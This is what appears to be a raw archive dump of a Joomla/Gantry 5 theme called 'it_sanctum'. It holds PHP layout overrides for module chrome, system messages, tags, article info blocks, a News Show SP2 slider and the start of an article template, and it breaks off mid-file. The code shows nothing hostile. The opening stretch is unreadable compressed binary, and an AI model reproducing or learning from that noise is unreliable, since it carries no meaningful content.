�5� w�i��6�+��j?�f��|�	Q(n��b�z�L�:��z��2d�:z��J��	l	�
&
^
�
�F��V

V
�
�t�~�P�����,���4n�(`�d��.<���BP^��<���8�<r��FX��2Dz�H���B`��4f��!*!�!�"�"�"�#,#�#�#�#�#�#�#�$$t%%T%�%�'D'�((V(�(�)))`)�)�*z*�++4+�,,�,�-X-�-�..`.�.�//"/v/�0T11<x�c`d``X�p�A�������1_�x��RMk1�����@	-�<��d764C!�N�!%	I��Z��ղ�&���S[�	�}�*_v��A��f���HD�~R@�l٥��
����A�q�G����<^������x҇���.��������mv~y���t~{ܡ�.y���x��w��u��t�y�A[��v��^��e�Dž9jfax���]��\x��ʔ��`�Ԃ��TI�n�s8k���E)4o��Tz�Ya�f%j;�^�TixR$��b���>M���*�.*�#]�H�Y�x/<�*Y@�O�����:�\<*�_<(%�RZLekm�XNj��+�
M�^W%�HT��D��i}���^�Z���{j,JQO����M60&�V�ML��Z]��D�`�yk
��M	��i@{�Ǻ��>�1d��!3�+�IP�HC��2`����L��
y;��\�F�v� ”b�.�:��Ad����c�ϑm��nH1����]}��-�>��^F�%�&�O\_��9�e:E�����vV{�F]��
�F����W��o��yȩ���u��u�Ρ��:�c=�����z<�Nj�xJ�W�O���=��S^�Y����V�����*(����x{g��Jty���{av�{+Yc��fN�LǾ�;��np��"u�j�+?ܴ�o�ћ�]�����ӥ|?�?�$x�mTe��6�{q���]{efp����[ٞغؒW�7�-333��3;r�{w�S�g$ٞyaZ;Z����k��h#@]� D}0�c��*va7��0��8G�(�cp,���8'�$��Sp*N��8g�,��sp."���q.�E���R\��q��U���Z\��qn�M���V܆�q��]���^܇���Cx��Q<�����Sx��Y<���b$HA� C�}��@	�
k0�p���60�&^�Kx��U������[x��]����>�G���S|�����W���[|���~�O���W������_���_���$�ko��_�,wQ\q`���&�L)�5qU�|+*� �z���Hh5��Y���dݠf�j^���u�z�
-��"�+��S��Z�4Ȥu��,(JtJ��ц�7QI�an�jT��D6n�T�b�|��:.uZԭ�X����A�3�e)]�F�$�$�Q���h3������Ebh�.��	Ki`�0+���\�t.�ꈂ��Z�6Ƀ�#R�#�gd:N�†Vf*ҵ��Lɵ��ݤ�U5_i��j�	%7���(�u�0:����"�$9%Ӡ��ɐ
na������`4q�J*~�:�U>rF
�1|~s���bv:�.�����-ֵ���[2�Ҽ@�MΧ��L�4��K|�#���r7�e�U1UF2r�9�n�@f�jah��D0Ab�!Y�.S�̰JdH�d��A���|�A!�4���]n��Xx���]��`F��&%�~ؤˤ�VkG�:�O�0a�U*L��f#���R*�:��&a)ʉ<����tg�����	F���k��-���/�W2��1���h_M��������gC�Go�ВsRe��
�7�Z�E������(Qe��D��;��������U�s�?OX�o����.y���٠Й^�|�.�J�y�
'ba�=`�E߬j�8�T�̭�}�#E3.�:���#PW����C�D�[��p+���F��"`K,�_��z��۵��'{Yٞ-!k���бw��pŋ�%�R�d*2Za�̸�q.�"�4
��s���F�/$B����q�
���	{��\������ʳ9,�ᩳHڅ��ۺ�/����Yڞ�ݘĔL3���pI޵��"�A^�=?i#+7�+Y�2	���޼��v�W�_����Ҍ�_�Z�R(�PK!gB��33it_sanctum/html/modules.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

// Gantry Specific Module Chrome
function modChrome_gantry($module, &$params, &$attribs)
{
	$moduleTag      = $params->get('module_tag', 'div');
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'));
	$bootstrapSize  = (int) $params->get('bootstrap_size', 0);
	$moduleClass    = $bootstrapSize != 0 ? ' span' . $bootstrapSize : '';

	// Temporarily store header class in variable
	$headerClass    = $params->get('header_class', 'g-title');
	$headerClass    = ($headerClass) ? ' class="' . htmlspecialchars($headerClass) . '"' : '';

	if (!empty ($module->content)) : ?>
		<<?php echo $moduleTag; ?> class="moduletable <?php echo htmlspecialchars($params->get('moduleclass_sfx')) . $moduleClass; ?>">
			<?php if ((bool) $module->showtitle) : ?>
				<<?php echo $headerTag . $headerClass . '>' . '<span>' . $module->title . '</span>'; ?></<?php echo $headerTag; ?>>
			<?php endif; ?>
			<?php echo $module->content; ?>
		</<?php echo $moduleTag; ?>>
	<?php endif;
}
PK!.Ac<<1it_sanctum/html/layouts/joomla/system/message.phpnu&1i�<?php
/**
 * @package   Gantry 5 Theme
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

defined('_JEXEC') or die;

$msgList = $displayData['msgList'];

?>
<?php if (is_array($msgList) && !empty($msgList)) : ?>
	<div id="system-message-container">
		<div id="system-message">
			<?php foreach ($msgList as $type => $msgs) : ?>
				<div class="alert alert-<?php echo $type; ?>">
					<?php // This requires JS so we should add it trough JS. Progressive enhancement and stuff. ?>
					<a class="close" data-dismiss="alert">×</a>

					<?php if (!empty($msgs)) : ?>
						<h4 class="alert-heading"><?php echo JText::_($type); ?></h4>
						<div>
							<?php foreach ($msgs as $msg) : ?>
								<p><?php echo $msg; ?></p>
							<?php endforeach; ?>
						</div>
					<?php endif; ?>
				</div>
			<?php endforeach; ?>
		</div>
	</div>
<?php endif; ?>
PK!�V
�HH/it_sanctum/html/layouts/joomla/content/tags.phpnu&1i�<?php
/**
 * @package     Joomla.Cms
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

use Joomla\Registry\Registry;

JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php');

?>
<?php if (!empty($displayData)) : ?>
	<div class="tags">
	    <span><?php echo JText::_('INSPIRE_TAGS'); ?> </span>
		<?php foreach ($displayData as $i => $tag) : ?>
			<?php if (in_array($tag->access, JAccess::getAuthorisedViewLevels(JFactory::getUser()->get('id')))) : ?>
				<?php $tagParams = new Registry($tag->params); ?>
				<?php $link_class = $tagParams->get('tag_link_class'); ?>
				<a href="<?php echo JRoute::_(TagsHelperRoute::getTagRoute($tag->tag_id . '-' . $tag->alias)) ?>" class="<?php echo $link_class; ?>" rel="tag"><?php echo $this->escape($tag->title); ?></a><?php if($i != (count($displayData)-1)) echo ','; ?>
			<?php endif; ?>
		<?php endforeach; ?>
	</div>
<?php endif; ?>
PK!�xh���<it_sanctum/html/layouts/joomla/content/info_block/author.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="createdby" itemprop="author" itemscope itemtype="http://schema.org/Person">
	<?php $author = ($displayData['item']->created_by_alias ? $displayData['item']->created_by_alias : $displayData['item']->author); ?>
	<?php $author = '<span itemprop="name" data-uk-tooltip title="' . JText::sprintf('COM_CONTENT_WRITTEN_BY', '') . '"><i class="fa fa-user"></i>' . $author . '</span>'; ?>
	<?php if (!empty($displayData['item']->contact_link ) && $displayData['params']->get('link_author') == true) : ?>
		<?php echo JHtml::_('link', $displayData['item']->contact_link, $author, array('itemprop' => 'url')); ?>
	<?php else :?>
		<?php echo $author; ?>
	<?php endif; ?>
</dd>PK!�]frrBit_sanctum/html/layouts/joomla/content/info_block/publish_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;
?>
<dd class="published">
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->publish_up, 'c'); ?>" itemprop="datePublished" data-uk-tooltip title="<?php echo JText::_('COM_CONTENT_PUBLISHED_DATE'); ?>">
		<i class="fa fa-clock-o"></i><?php echo JHtml::_('date', $displayData['item']->publish_up, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!r
��kkEit_sanctum/html/layouts/joomla/content/info_block/parent_category.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
			<dd class="parent-category-name">
				<?php $title = $this->escape($displayData['item']->parent_title); ?>
				<?php if ($displayData['params']->get('link_parent_category') && !empty($displayData['item']->parent_slug)) : ?>
					<?php $url = '<a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($displayData['item']->parent_slug)) . '" itemprop="genre">' . $title . '</a>'; ?>
					<?php echo JText::sprintf('COM_CONTENT_PARENT', $url); ?>
				<?php else : ?>
					<?php echo JText::sprintf('COM_CONTENT_PARENT', '<span itemprop="genre">' . $title . '</span>'); ?>
				<?php endif; ?>
			</dd>PK!�f�FF:it_sanctum/html/layouts/joomla/content/info_block/hits.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="hits">
	<meta itemprop="interactionCount" content="UserPageVisits:<?php echo $displayData['item']->hits; ?>" />
	<span data-uk-tooltip title="<?php echo JText::sprintf('COM_CONTENT_ARTICLE_HITS', ''); ?>"><i class="fa fa-eye"></i><?php echo JText::sprintf($displayData['item']->hits); ?></span>
</dd>PK!�x�llAit_sanctum/html/layouts/joomla/content/info_block/modify_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="modified">
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->modified, 'c'); ?>" itemprop="dateModified" data-uk-tooltip title="<?php echo JText::_('COM_CONTENT_MODIFIED_DATE'); ?>">
		<i class="fa fa-clock-o"></i><?php echo JHtml::_('date', $displayData['item']->modified, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!��Z�ffAit_sanctum/html/layouts/joomla/content/info_block/create_date.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="create">
	<time datetime="<?php echo JHtml::_('date', $displayData['item']->created, 'c'); ?>" itemprop="dateCreated" data-uk-tooltip title="<?php echo JText::_('COM_CONTENT_CREATED_DATE'); ?>">
		<i class="fa fa-clock-o"></i><?php echo JHtml::_('date', $displayData['item']->created, JText::_('DATE_FORMAT_LC3')); ?>
	</time>
</dd>PK!bҺ���>it_sanctum/html/layouts/joomla/content/info_block/category.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

?>
<dd class="category-name">
	<?php $title = $this->escape($displayData['item']->category_title); ?>
	<?php if ($displayData['params']->get('link_category') && $displayData['item']->catslug) : ?>
		<?php echo '<span data-uk-tooltip title="' . JText::_('COM_CONTENT_CONTENT_TYPE_CATEGORY') . '"><i class="fa fa-folder-open-o"></i><a href="' . JRoute::_(ContentHelperRoute::getCategoryRoute($displayData['item']->catslug)) . '" itemprop="genre">' . $title . '</a></span>'; ?>
	<?php else : ?>
		<?php echo '<span itemprop="genre" itemprop="genre" data-uk-tooltip title="' . JText::_('COM_CONTENT_CONTENT_TYPE_CATEGORY') . '"><i class="fa fa-folder-open-o"></i>' . $title . '</span>'; ?>
	<?php endif; ?>
</dd>PK!V��u�D�D-it_sanctum/html/mod_news_show_sp2/default.phpnu&1i�<?php
/*
# News Show SP2 - News display/Slider module by JoomShaper.com
# Author    JoomShaper http://www.joomshaper.com
# Copyright (C) 2010 - 2015 JoomShaper.com. All Rights Reserved.
# @license - GNU/GPL V2 or later
# Websites: http://www.joomshaper.com
*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

$modId = $module->id;

if ( $article_column>=$c_article_count )
{
	$article_column 	= $c_article_count;
	$article_row		= 1;
}

$date_time 				= '';
$row 					= 0;
$link_row 				= 0;
$i 						= 0;
$j 						= 0;

?>

<!-- Fix for slide/arrows when Mootools is loaded  -->
<script type="text/javascript">
(function($) {

	var carousel = jQuery('.carousel');
	if(carousel){
		$(document).ready(function() {
			if (typeof jQuery != 'undefined' && typeof MooTools != 'undefined' ) {
				Element.implement({
					slide: function(how, mode){
						return this;
					}
				});
			}               
		});
	}
})(jQuery);
</script>

<div id="ns2-<?php echo $modId; ?>" class="nssp2 ns2-<?php echo $uniqid ?>">
	<div class="ns2-wrap">
		<?php if ($c_article_count > 0): ?>
			<div id="ns2-art-wrap<?php echo $modId; ?>" class="ns2-art-wrap <?php echo ($article_animation!="disabled") ? $article_animation . ' ' . $article_controllers_style : '' ?> <?php if ($links_block && $c_links_count!=0 && $links_position=="right"): ?> col-2 flt-left<?php endif; ?>">			
				<div class="ns2-art-pages nss2-inner">
				<?php for($i=0;$i<$c_article_count;$i++): $row++; ?>
					<?php
						if( $article_animation != "disabled" )
						{
							if( $i == 0 ){
								$anim_class = 'item active';
							}
							else
							{
								$anim_class = 'item';
							}
						}
						else
						{
							$anim_class = '';
						}
					?>
					<div class="ns2-page <?php echo $anim_class; ?>">
						<div class="ns2-page-inner">
						<div class="ns2-page-inner-custom">
						<?php for($j=0;$j<$article_row;$j++, $i++): ?>
							<div class="ns2-row <?php echo $j==0 ? 'ns2-first' : '' ?> <?php echo $j%2 ? 'ns2-even' : 'ns2-odd' ?>">
								<div class="ns2-row-inner">
								<?php for($z=0;$z<$article_column;$z++, $i++): ?>
									<?php if ($i <$c_article_count): ?>
									<div class="ns2-column flt-left col-<?php echo $article_column ?>">
										<div style="padding:<?php echo $article_col_padding ?>">
											<div class="ns2-inner">
												<?php /*Date type blog*/ if ($article_date_format=='blog'): ?>
													<div class="ns2-date-blog">
														<?php
															$date_time = explode(' ', JHTML::_('date', $list[$i]->created, 'd M Y'));
															echo '<span class="ns2_date_day">' . $date_time[0] . '</span>';
															echo '<div class="ns2_date_month_year"><span class="ns2_date_month">' . $date_time[1] . '</span><span class="ns2_date_year">' . $date_time[2] . '</span></div>';
														?>
													</div>
												<?php endif; ?>												
											
												<?php /*Image position before title*/if ($article_show_image && $article_image_pos=='top' && $list[$i]->image): ?>
													<?php if ($article_linked_image): ?>
														<a class="ns2-image-link" href="<?php echo $list[$i]->link ?>" style="<?php echo $article_image_float ?>;<?php echo ($article_image_margin) ? "margin:$article_image_margin" : "" ?>">
													<?php endif; ?>
														<?php if ($article_linked_image): ?><span class="ns2-image-overlay"></span><?php endif; ?>
														<img class="ns2-image" <?php if ($article_linked_image == false): ?>style="<?php echo $article_image_float ?>;<?php echo ($article_image_margin) ? "margin:$article_image_margin" : "" ?>"<?php endif; ?> src="<?php echo modNSSP2CommonHelper::thumb($list[$i]->image, $article_thumb_width, $article_thumb_height, $article_thumb_ratio, $uniqid) ?>" alt="<?php echo $list[$i]->title ?>" title="<?php echo $list[$i]->title ?>" />
													<?php if ($article_linked_image): ?>		
														</a>
													<?php endif; ?>			
												<?php endif; ?>												
												
												<?php /*Article title*/ if ($article_showtitle): ?>
													<h4 class="ns2-title">
														<?php if ($article_linkedtitle): ?>
															<a href="<?php echo $list[$i]->link ?>">
														<?php endif; ?>	
															<?php echo modNSSP2CommonHelper::cText($list[$i]->title, $article_count_title_text, $article_title_text_limit); ?>
														<?php if ($article_linkedtitle): ?>
															</a>
														<?php endif; ?>	
													</h4>
												<?php endif; ?>
	
												<?php /*Image position after title*/if ($article_show_image && $article_image_pos=='bottom' && $list[$i]->image): ?>
													<?php if ($article_linked_image): ?>
														<a class="ns2-image-link" href="<?php echo $list[$i]->link ?>" style="<?php echo $article_image_float ?>;<?php echo ($article_image_margin) ? "margin:$article_image_margin" : "" ?>">
													<?php endif; ?>
														<span class="ns2-image-overlay"></span>
														<img class="ns2-image" <?php if ($article_linked_image == false): ?>style="<?php echo $article_image_float ?>;<?php echo ($article_image_margin) ? "margin:$article_image_margin" : "" ?>"<?php endif; ?> src="<?php echo modNSSP2CommonHelper::thumb($list[$i]->image, $article_thumb_width, $article_thumb_height, $article_thumb_ratio, $uniqid) ?>" alt="<?php echo $list[$i]->title ?>" title="<?php echo $list[$i]->title ?>" />
													<?php if ($article_linked_image): ?>		
														</a>
													<?php endif; ?>			
												<?php endif; ?>			
												
												<?php /*Ratings*/ if ($article_show_ratings): ?>
													<div class="ns2-rating">
														<div class="ns2-rating-bar">
															<div style="width:<?php echo $list[$i]->rating ?>%"></div>	
														</div>	
													</div>
												<?php endif; ?>

												<?php /*Introtext*/ if ($article_introtext): ?>
													<p class="ns2-introtext"><?php echo modNSSP2CommonHelper::cText($list[$i]->introtext, $article_count_intro_text, $article_intro_text_limit) ?></p>								
												<?php endif; ?>
												
												<div class="ns2-social">
													<?php /* Social Share */
														foreach (modNSSP2SocialHelper::icons($list[$i], $params) as $icon) {
															echo $icon;
														}
													?>
												</div>
												
												<?php /*Virtuemart*/ if ($art_show_price || $art_show_cart_button) : ?>
													<div class="ns2-vm-bar">
														<?php /*Show Price*/ if ($art_show_price) : ?>
															<p class="ns2-vm-price"><?php echo $list[$i]->price ?></p>
														<?php endif; ?>

														<?php /*Show Cart Button*/ if ($art_show_cart_button) : ?>
															<?php echo $list[$i]->addtocart ?>
														<?php endif; ?>
													</div>
												<?php endif; ?>
												
												<?php /*K2 Extra fields*/ if ($article_extra_fields && $content_source == 'k2' && count($list[$i]->extra_fields)): ?>
													<div style="clear:both"></div>
													<div class="NS2K2ExtraFields">
														<b><?php echo JText::_('Additional Info'); ?></b>
														<ul>
															<?php foreach ($list[$i]->extra_fields as $key=>$extraField): ?>
																<li class="type<?php echo ucfirst($extraField->type); ?> group<?php echo $extraField->group; ?> <?php echo strtolower($extraField->name) ?> <?php echo $key%2 ? 'even' : 'odd';?> <?php if ($key==0) echo 'first'; ?>">
																	<span class="label"><?php echo $extraField->name; ?></span>
																	<span class="value"><?php echo $extraField->value; ?></span>
																	<div style="clear:both"></div>
																</li>
															<?php endforeach; ?>
														</ul>
													</div>
													<div style="clear:both"></div>
												<?php endif; ?>	

												<?php /*Comments, readmore, hits*/ if ($article_show_more || $article_hits || $article_comments || $article_show_author || $article_date_format || $article_show_category): ?>
													<div class="ns2-links">

														<?php /*Show date*/ if (($article_date_format) && ($article_date_format!='blog')): ?>
															<div class="ns2-created">
																<?php echo JHTML::_('date', $list[$i]->created, JText::_($article_date_format)) ?>
															</div>
														<?php endif; ?>

														<?php /*Show Author*/ if ($article_show_author): ?>
															<div class="ns2-author">
																<?php echo $list[$i]->author; ?>
															</div>
														<?php endif; ?>

														<?php /*Show category*/ if ($article_show_category): ?>
															<div class="ns2-category">		
																<?php if ($article_linked_category): ?>
																	<a href="<?php echo $list[$i]->cat_link ?>">
																<?php endif; ?>	
																	<?php echo $list[$i]->category ?>
																<?php if ($article_linked_category): ?>
																	</a>
																<?php endif; ?>	
															</div>														
														<?php endif; ?>													
														
														<?php /*Comments*/ if ($article_comments):
															echo $list[$i]->comment;
														endif; ?>

														<?php /*Hits*/ if ($article_hits): ?>
															<span class="ns2-hits"><?php echo $list[$i]->hits ?></span>
														<?php endif; ?>

														<?php /*Readmore*/ if ($article_show_more): ?>
															<a class="ns2-readmore" href="<?php echo $list[$i]->link ?>"><span><?php echo $article_more_text ?></span></a>
														<?php endif; ?>

													</div>
												<?php endif; ?>
												<div style="clear:both"></div>
												
											</div>
										</div>
									</div>
									<?php endif; ?>
								<?php endfor; $i--; ?>
								<div style="clear:both"></div>
							</div>
							<div style="clear:both"></div>
							</div>
						<?php endfor; $i--; ?>
						</div>
						<div style="clear:both"></div>
						</div><!--end ns2-page-inner-->
					</div>
				<?php endfor; ?>
				</div>
				
				
				<?php /*Navigation*/ if ($article_animation!="disabled"): ?>
					<div style="clear:both"></div>
					<div class="ns2-art-controllers">
						<?php /*Pagination*/ if ($article_pagination): ?>
							<div class="ns2-art-pagination nssp2-controllers">
								<?php for ($i=0; $i < $row; $i++) { ?>
									<span data-target="#ns2-art-wrap<?php echo $modId; ?>" data-nsspwalk-to="<?php echo $i; ?>" class="<?php echo ($i==0) ? 'active' : ''; ?>"><i class="fa fa-circle"></i></span>
								<?php } ?>
							</div>
						<?php endif; ?>

						<?php /*Next & Previous*/ if ($article_arrows): ?>
							<a class="ns2-art-prev" href="#ns2-art-wrap<?php echo $modId; ?>" data-nsspwalk="prev"><i class="fa fa-chevron-left"></i></a>				
							<a class="ns2-art-next" href="#ns2-art-wrap<?php echo $modId; ?>" data-nsspwalk="next"><i class="fa fa-chevron-right"></i></a>
						<?php endif; ?>
						<div style="clear:both"></div>
					</div>
				<?php endif; ?>
				<div style="clear:both"></div>
			</div>
		<?php endif; ?>
		<!--End article layout-->
		
		<!--Links Layout-->
		<?php if ($links_block && $c_links_count!=0): ?>
		<?php 
			$links=$c_article_count;
		?>
		<div id="ns2-links-wrap<?php echo $modId; ?>" class="ns2-links-wrap <?php echo ($links_animation!="disabled") ? $links_animation . ' ' . $links_controllers_style : '' ?> <?php if ($links_position=="right"): ?> col-2 flt-left<?php endif; ?>">
			<?php if ($links_more): ?>
				<strong><?php echo  JText::_($links_more_text) ?></strong>
			<?php endif; ?>
			<div class="ns2-links-pages nssp2-inner">
			<?php for( $i = $links; $i < $links+$c_links_count; $i++ ): $link_row++; ?>
				<?php
					if( $links_animation != "disabled" )
					{
						if( $i == $links ){
							$anim_class = 'item active';
						}
						else
						{
							$anim_class = 'item';
						}
					}
					else
					{
						$anim_class = '';
					}
				?>
				<div class="ns2-page <?php echo $anim_class; ?>">
					<div class="ns2-page-inner">
						<?php for ($ii=0; $ii<$links_count; $ii++, $i++): ?>
							<?php if ($i<$a_count): ?>
								<div class="ns2-row <?php echo $ii==0 ? 'ns2-first' : '' ?> <?php echo $ii%2 ? 'ns2-even' : 'ns2-odd' ?>">
									<div class="ns2-row-inner">
										<div style="padding:<?php echo $links_col_padding ?>">
											<div class="ns2-inner">
												<?php /*Show Image*/ if ($links_show_image && $links_image_pos=='top' && $list[$i]->image): ?>
													<?php if ($links_linked_image): ?>
														<a class="ns2-image-link" href="<?php echo $list[$i]->link ?>" style="<?php echo $links_image_float ?>;<?php echo ($links_image_margin) ? "margin:$links_image_margin" : "" ?>">
													<?php endif; ?>
														<?php if ($links_linked_image): ?><span class="ns2-image-overlay"></span><?php endif; ?>	
														<img class="ns2-image" <?php if ($links_linked_image == false): ?>style="<?php echo $links_image_float ?>;<?php echo ($links_image_margin) ? "margin:$links_image_margin" : "" ?>"<?php endif; ?> src="<?php echo modNSSP2CommonHelper::thumb($list[$i]->image, $links_thumb_width, $links_thumb_height, $links_thumb_ratio, $uniqid) ?>" alt="<?php echo $list[$i]->title ?>" title="<?php echo $list[$i]->title ?>" />
													<?php if ($links_linked_image): ?>		
														</a>
													<?php endif; ?>	
												<?php endif; ?>													
												
												<!--Start title-->											
												<h4 class="ns2-title">
													<a href="<?php echo $list[$i]->link ?>"><?php echo modNSSP2CommonHelper::cText($list[$i]->title, $links_title_count, $links_title_text_limit); ?></a>
												</h4>

												<?php /*Image after title*/ if ($links_show_image && $links_image_pos=='bottom' && $list[$i]->image): ?>
													<?php if ($links_linked_image): ?>
														<a class="ns2-image-link" href="<?php echo $list[$i]->link ?>" style="<?php echo $links_image_float ?>;<?php echo ($links_image_margin) ? "margin:$links_image_margin" : "" ?>">
													<?php endif; ?>
														<?php if ($links_linked_image): ?><span class="ns2-image-overlay"></span><?php endif; ?>
														<img class="ns2-image" <?php if ($links_linked_image == false): ?>style="<?php echo $links_image_float ?>;<?php echo ($links_image_margin) ? "margin:$links_image_margin" : "" ?>"<?php endif; ?> src="<?php echo modNSSP2CommonHelper::thumb($list[$i]->image, $links_thumb_width, $links_thumb_height, $links_thumb_ratio, $uniqid) ?>" alt="<?php echo $list[$i]->title ?>" title="<?php echo $list[$i]->title ?>" />
													<?php if ($links_linked_image): ?>		
														</a>
													<?php endif; ?>	
												<?php endif; ?>	
												
												<?php /*Intro Text*/ if ($links_show_intro): ?>
													<p class="ns2-introtext"><?php echo modNSSP2CommonHelper::cText($list[$i]->introtext, $links_intro_count, $links_intro_text_limit) ?></p>															
												<?php endif; ?>
							
												<?php /*Virtuemart*/ if ($links_show_price || $links_show_cart_button) : ?>
													<div class="ns2-vm-bar">
														<?php /*Show Price*/ if ($links_show_price) : ?>
															<p class="ns2-vm-price"><?php echo $list[$i]->price ?></p>
														<?php endif; ?>

														<?php /*Show Cart Button*/ if ($links_show_cart_button) : ?>
															<?php echo $list[$i]->addtocart ?>
														<?php endif; ?>
													</div>
												<?php endif; ?>
												<div style="clear:both"></div>
											</div>
										</div>
										<div style="clear:both"></div>
									</div>
								</div>
							<?php endif; ?>
						<?php endfor; $i--; ?>
						<div style="clear:both"></div>
					</div><!--End ns2-page-inner-->
				</div>
			<?php endfor; ?>
			</div>
			
			<?php /*Navigation*/ if ($links_animation!="disabled"): ?>
				<div style="clear:both"></div>
				<div class="ns2-links-controllers">
					<?php /*Pagination*/ if ($links_pagination): ?>
						<div class="ns2-links-pagination nssp2-controllers">
							<?php for ($i=0; $i < $link_row; $i++) { ?>
								<span data-target="#ns2-links-wrap<?php echo $modId; ?>" data-nsspwalk-to="<?php echo $i; ?>" class="<?php echo ($i==0) ? 'active' : ''; ?>"></span>
							<?php } ?>
						</div>
					<?php endif; ?>
					<?php /*Next & Previous*/ if ($article_arrows): ?>
						<a class="ns2-links-prev" href="#ns2-links-wrap<?php echo $modId; ?>" data-nsspwalk="prev">&laquo;</a>				
						<a class="ns2-links-next" href="#ns2-links-wrap<?php echo $modId; ?>" data-nsspwalk="next">&raquo;</a>
					<?php endif; ?>
					<div style="clear:both"></div>
				</div>
			<?php endif; ?>
			<div style="clear:both"></div>	
		</div>
		<?php endif; ?>
		<!--End Links Layout-->
		<div style="clear:both"></div>
	</div>
</div>

<script type="text/javascript">
	<?php if ($c_article_count > 0 && $article_animation!="disabled"): ?>
		!function ($) {
	        $(function(){
	          $('#ns2-art-wrap<?php echo $modId; ?>').nssp2({
	          	interval: <?php echo $article_animation_interval; ?>
	          })
	        })
	    }(window.jQuery)
	<?php endif; ?>

	<?php if ($links_block && $c_links_count!=0 && $links_animation!="disabled"): ?>
		!function ($) {
	        $(function(){
	          $('#ns2-links-wrap<?php echo $modId; ?>').nssp2({
	          	interval: <?php echo $links_animation_interval; ?>
	          })
	        })
	    }(window.jQuery)
	<?php endif; ?>
</script>PK!OF�/it_sanctum/html/com_content/article/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

// Create shortcuts to some parameters.
$params  = $this->item->params;
$images  = json_decode($this->item->images);
$urls    = json_decode($this->item->urls);
$canEdit = $params->get('access-edit');
$user    = JFactory::getUser();
$info    = $params->get('info_block_position', 0);
JHtml::_('behavior.caption');
?>
<article class="item item-page<?php echo $this->pageclass_sfx; ?>" itemscope itemtype="https://schema.org/Article">
	<meta itemprop="inLanguage" content="<?php echo ($this->item->language === '*') ? JFactory::getConfig()->get('language') : $this->item->language; ?>" />
	<?php if ($this->params->get('show_page_heading')) : ?>
	<div class="page-header">
		<h1> <?php echo $this->escape($this->params->get('page_heading')); ?> </h1>
	</div>
	<?php endif;
	if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && $this->item->paginationrelative)
	{
		echo $this->item->pagination;
	}
	?>

	<?php // Todo Not that elegant would be nice to group the params ?>
	<?php $useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
	|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') ); ?>

	<?php if (!$useDefList && $this->print) : ?>
		<div id="pop-print" class="btn hidden-print">
			<?php echo JHtml::_('icon.print_screen', $this->item, $params); ?>
		</div>
		<div class="clearfix"> </div>
	<?php endif; ?>
	<?php if ($params->get('show_title') || $params->get('show_author') || ($useDefList && ($info == 0 || $info == 2))) : ?>
	<div class="g-article-header">
		<?php if ($params->get('show_title') || $params->get('show_author')) : ?>
		<div class="page-header">
			<h2 itemprop="name">
				<?php echo $this->escape($this->item->title); ?>
			</h2>
			<?php if ($this->item->state == 0) : ?>
				<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
			<?php endif; ?>
			<?php if (strtotime($this->item->publish_up) > strtotime(JFactory::getDate())) : ?>
				<span class="label label-warning"><?php echo JText::_('JNOTPUBLISHEDYET'); ?></span>
			<?php endif; ?>
